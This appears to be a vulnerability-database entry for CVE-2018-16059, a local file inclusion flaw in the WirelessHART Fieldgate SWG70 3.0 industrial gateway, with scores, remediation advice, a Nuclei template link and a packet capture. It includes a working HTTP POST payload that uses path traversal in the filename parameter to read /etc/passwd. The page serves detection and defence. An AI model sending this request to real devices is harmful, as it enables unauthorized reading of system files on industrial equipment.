🔙 목록으로 돌아가기

CVE-2018-16059: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion

TitleWirelessHART Fieldgate SWG70 3.0 - Local File Inclusion
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read sensitive files on the system, potentially leading to unauthorized access or information disclosure.
RemediationApply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in WirelessHART Fieldgate SWG70 3.0.
CVSS Score5.3
EPSS Score0.37052
CVE IDCVE-2018-16059
CWE IDCWE-22
Tags cve cve2018 iot lfi edb endress vkev vuln

🔍 Vulnerability Description

WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter.

🌐 HTTP Request

POST /fcgi-bin/wgsetcgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Connection: close
Content-Length: 129
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-16059.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-16059.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A